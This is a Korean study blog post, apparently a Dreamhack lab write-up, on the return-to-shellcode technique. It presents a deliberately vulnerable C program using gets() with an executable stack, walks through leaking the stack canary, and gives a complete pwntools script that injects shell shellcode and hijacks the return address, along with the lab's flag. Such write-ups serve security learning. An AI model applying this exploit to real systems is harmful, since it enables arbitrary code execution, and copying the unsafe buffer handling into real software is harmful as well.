Exploit Tech: Return to Shellcode

---

Return Address OverWrite

카나리 우회와 셸 코드를 이용해 셸을 획득하는 방법

// Name: r2s.c
// Compile: gcc -o r2s r2s.c -zexecstack
 
#include <stdio.h>
#include <unistd.h>
 
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}
 
int main() {
  char buf[0x50];
 
  init();
 
  printf("Address of the buf: %p\n", buf);
  printf("Distance between buf and $rbp: %ld\n",
         (char*)__builtin_frame_address(0) - buf);
 
  printf("[1] Leak the canary\n");
  printf("Input: ");
  fflush(stdout);
 
  read(0, buf, 0x100);
  printf("Your input is '%s'\n", buf);
 
  puts("[2] Overwrite the return address");
  printf("Input: ");
  fflush(stdout);
  gets(buf);
 
  return 0;
}

---

보호기법

리눅스에는 다양한 바이너리 보호기법이 존재합니다.
적용된 보호기법에 따라 익스플로잇 설계가 달라지며, 분석을 시도하기 전에 파악 추천!

보호기법을 파악할 때 주로 사용되는 툴이 checksec입니다.
pwntools를 설치할 때 같이 설치되어 ~/.local/bin/checksec에 위치합니다.
checksec을 사용하면 간단한 커맨드 하나로 바이너리 보호기법을 파악할 수 있습니다.

만약 해당 커멘드를 사용하다가 command not found 라는 에러가 발생 시
/.bashrc에 마지막 줄에 다음 줄을 입력하세요.

export PATH="$HOME/.local/bin/:$PATH"

checksec으로 파악할 수 있는 보호기법은 RELRO, Canary, NX, PIE 이렇게 4가지입니다.
여기선 checksec이란 툴이 있고 r2s 바이너리에 카나리가 적용되었다는 부분이 확인되죠

---

취약점 탐색

---

1. 버퍼의 주소

이 코드에선 편의를 위해 buf의 주소 및 rbp와 buf의 차이까지 표현하네요.

---

2. stack BOF

buf의 크기가 0x50(80byte)인데..
read와 gets는 버퍼 오버 플로우를 발생시키는 함수로 사용했네요.
또한 두번 다 입력받는데 두 번다 BOF가 발생하므로 canary를 우회할 수 있겠네요

 

이 코드를 활용해 셸을 획득해 우회를 해봅시다.

---

exploit 시나리오🎬

---

1. 카나리 우회

두 번째 입력으로도 반환 주소(RET)를 덮을 수는 있지만, 카나리가 조작되면..
__stack_chk_fail 함수에 의해 프로그램이 강제로 종료됩니다.

 

그러므로 첫 번째 입력에서 카나리를 구하고, 이를 두 번째의 입력에 사용해야하죠

첫 번째 입력의 버퍼에 buf를 문자열로 출력하므로 적절한 오버플로우를 발생시키면
카나리의 값을 얻을 수 있죠

---

2. 셸 획득

카나리를 구하면, 이제 두 번째 입력에 RET를 덮을 수 있습니다.
그러나 코드에 get_shell()과 같은 함수는 없기에 셸을 획득하는 코드를 직접 주입하고,
해당 주소로 실행 흐름을 옮겨 주소를 알고 있는 buf에 셸 코드를 주입하고, 해당 주소로 실행 흐름 옮김

 

셸을 획득할 수 있겠죠 그럼 한 번 실습해볼까요

---

익스플로잇

스택 프레임 정보 수집🧱

스택을 이용해 공격할 것이므로, 스택 프레임의 구조를 먼저 파악해야 합니다.
이 예제에선 스택 프레임의 buf 위치를 보여주므로, 이를 적절히 파싱할 수만 있으면 되죠!!

보기처럼 나와야함

여기서 buf의 값을 입력받는 부분과 buf2_sfp를 파싱하는 부분에서 저는 의문이 들었는데요

 

첫 번째는 buf에선 포인터로 출력되기에 int(p.recvline(), 16)인 건 당연하지만 굳이 [:-1]을 넣었을까?
그 이유는 밑에 나온 링크처럼 개행문자나 문자열 끝단을 효과적으로 제거하기 위해서이지만 개행문자는
recvline()에서 애시당초 그 기준으로 받기 때문에 필요가 없다고 생각했습니다.
로컬에서도 당연히 값은 똑같이(솔직히 할 때마다 바뀌니까 확인이 힘들지만) 나오는 거 같고요

 

그래서 buf = int(recvn(14), 16)이랑 차이도 없을 거 같은데 왜 저런 형식을 선호할까요?
더 정확하게 문제없이 받아서일까요?

What does [:-1] mean/do in python?

두 번째로는 buf2_sfp에 의 존재 이유입니다
본래 split()[0]은 공백 기준 받은 내용을 딕셔너리에 0번째 인덱스의 값을 불러온다는 뜻인데..
받아드리는 정보 자체가 (char*)__builtin_frame_address(0) - buf 의 값인데
그럼 바로 rbp와 buf의 차이가 바로 나오는 거라 즉, sfp가 나오는 거잖아요

 

그런데 굳이 split()[0]으로 할 필요가 있을까요.. 어짜피 sfp 주소가 바로 나올건데..
라는게 저의 생각이였습니다. 그러나 local과 remote에서의 환경에 의하여 그러한 문제를 최소화하기 위해
위와 같은 방법으로 확실하게 명시하여 지정한 것이 아닐까..

 

즉, 오프셋 결과를 최대한 명시적으로 지정하여 오버해드를 단축 및 동일시를 위한 것이다.. 라고 생각이 드네요

내가 생각한 별 차이가 없을 거 같던 코드

오프셋 : 배열이나 자료 구조 오브젝트 내의 오프셋은 일반적으로 동일 오브젝트 안에서
오브젝트 처음부터 주어진 요소나 지점까지의 변위차를 나타내는 정수형

오프셋 (컴퓨터 과학) - 위키백과, 우리 모두의 백과사전

오버해드 : 어떤 처리를 하기 위해 들어가는 간접적인 처리 시간 · 메모리 등을 지칭함

오버헤드 - 위키백과, 우리 모두의 백과사전

두 코드의 차이점이 있으나 결과는 동일..?

아, 또한 C코드에서 보시면 buf(0x50)인데 canary까지 합하면 0x8이므로
0x58이 되야지만 stack alignment 최적화를 위해 16의 배수(x64니까요)로 채워
0x60.. 왜 그런지 의문이 들때가 저도 있어서 찾아보며, 정리를 하자면..

 

저희 아키텍처(x64기준) 16byte씩 fetch를 합니다.
최대한 rsp(시작부분)쪽에 가깝게 있어야 최적화된 상태의 fetch를 하겠죠

그러므로 스택의 최상단부터 fetch를 하며, 끝단에 맞추어 fetch하기에 최대한 맞추어 한다면
아무래도 효율이 더욱 좋겠죠

 

비어있는 공간의 효율?

what is "stack alignment"?

 

아래 내용은 Dreamhack 관리자 분께서 친히 달아주신 내용으로 저는 여기까지는..
좀 어렵네요 아직 여기까지는 필요성이나 중요성을 알아가는 단계라 명확하게 말은 ㅠ

1. System V ABI에서는 stack alignment가 16byte이길 요구함
2. Automatic Vectorization를 위해 16byte align을 요구
- 컴파일러의 최적화
3. 16byte alignment를 사용함으로써 cache line에 cross가 발생 X
- 보다 효율적인 데이터 접근이 가능해짐!!(그 이유는 앞에서 설명했죠)

Why does the x86-64 / AMD64 System V ABI mandate a 16 byte stack alignment?

---

카니리 릭🦜

스택 프레임에 대한 정보를 수집했으므로, 이를 활용해 카나리를 구합시다.

 

buf와 카나리 사이를 임의의 값으로 채우면,
프로그램에서 buf를 출력할 때 카나리도 같이 출력될 것입니다.

 

앞에서 구한 스택 프레임의 구조를 고려해, 카나리를 구하도록 스크립트를 추가해봅시다.

출력은 위와 같이 나오도록..

C코드를 보시면 아시겠지만 받자마자 다시 fflush를 하기 때문에 받고나서
카나리 릭을 알아내어 해보면.. \x00로 시작하여 Canary 7byte를 마저 받고 추출!

 

참고로 Canary는 첫 스타트가 null-byte로 시작한답니다(앵간해선)

---

Exploit🎮

카나리를 구했으니까 이제 buf에 쉘 코드를 주입하고, 카나리를 구한 값으로 덮은 뒤,
반환 주소(RET)를 buf로 덮으면 셸코드가 실행되게 할 수 있습니다.

실행 결과

shellcraft를 사용해 shellcode를 불러오고, shellcode 후에 바로 'ljust'함수를 활용
buf2_cnry의 버퍼만큼 shellcode기입후 나머지 공간은 NOP나 더미값으로 채우고..
획득한 canary값 + sfp(8byte) + buf addr(RET)로 넣어서 gets()함수의 특성을 고려해서..
개행문자까지 받으므로 sendlineafter로 넣어서 하면 됩니다.

Python String ljust()

---

전체 코드 

#!/usr/bin/env python3
# Name : r2s.py
 
from pwn import *
def slog(n, m): return success(":".join([n, hex(m)]))
 
 
p = process('./r2s')
context(arch='amd64', os='linux')
e = ELF('./r2s')
 
 
#[1] Get information about buf
p.recvuntil("buf: ")
buf = int(p.recvline()[:-1], 16)
slog('Address of the buf', buf)
 
p.recvuntil('$rbp: ')
buf2_sfp = int(p.recvline().split()[0])
buf2_canary = buf2_sfp - 8
 
slog('buf <=> sfp', buf2_sfp)
slog('buf <=> canary', buf2_canary)
 
# [2] Leak canary value
payload = b"A"*(buf2_canary + 1)  # (+1) because of the first null-byte
p.sendafter("Input:", payload)
p.recvuntil(payload)
 
canary = u64(b"\x00"+p.recvn(7))
slog("Canary", canary)
 
# [3] Exploit
sh = asm(shellcraft.sh())
payload = sh.ljust(buf2_canary, b"A") + p64(canary) + b"B"*0x8 + p64(buf)
# gets() receives input until "\n" is received
p.sendlineafter("Input:", payload)
 
p.interactive()

실수로 원격 RCE가 아니라 local에서만 되는 코드인데 그냥 remote만 넣어주면 되니까..

DH{333eb89c9d2615dd8942ece08c1d34d5}

---

결론

코스에서는 스택 버퍼에 코드를 주입하여 실행했지만, 이 외에도 전역으로 선언된 버퍼나, 힙 버퍼 등에도 셸코드를 주입하여 실행시킬 수 있습니다. 특히, 전역 버퍼는 PIE가 적용되지 않으면 주소가 고정되기 때문에, 버퍼의 주소를 구하는 별도의 과정 없이도 해당 버퍼로 실행 흐름을 옮길 수 있습니다.

 

이 공격 기법은 다음 조건이 만족되면 사용할 수 있습니다.

1. 코드를 삽입할 수 있는 임의의 버퍼가 있을 때, 해당 버퍼의 주소를 알거나, 구할 수 있다.
2. 실행 흐름을 옮길 수 있다. ← 스택 버퍼 오버플로우도 여기 포함됩니다.

- Arbitrary Code Execution(임의 코드 실행;ACE) : 임의의 코드 실행하는 것
- Remote Code Execution(원격 코드 실행;RCE) : 원격 서버를 대상으로 ACE 수행

RCE는 서버를 대상으로 한 공격들 중, 매우 파괴적인 공격에 속하며, 컴퓨터 과학자들은 서버에서 RCE의 위험을 줄이기 위해 여러 보호 기법을 고안했습니다. 대표적으로 코드 섹션 외의 모든 섹션에 실행 권한을 없애는 NX(Not eXecutable)가 있으며, 바이너리를 실행할 때마다 임의의 주소에 스택과 힙을 할당하는 ASLR(Address Space Layout Randomization)이 있습니다.

 

r2s는 컴파일할 때, gcc에 -zexecstack 옵션을 추가하여 NX를 해제했기 때문에 buf에 주입한 셸코드를 실행할 수 있었습니다.

---

참고 자료

Exploit Tech: Return to Shellcode

What does [:-1] mean/do in python?

오프셋 (컴퓨터 과학) - 위키백과, 우리 모두의 백과사전

오버헤드 - 위키백과, 우리 모두의 백과사전

비어있는 공간의 효율?

what is "stack alignment"?

Why does the x86-64 / AMD64 System V ABI mandate a 16 byte stack alignment?

참고 이미지

Exploit Tech: Return to Shellcode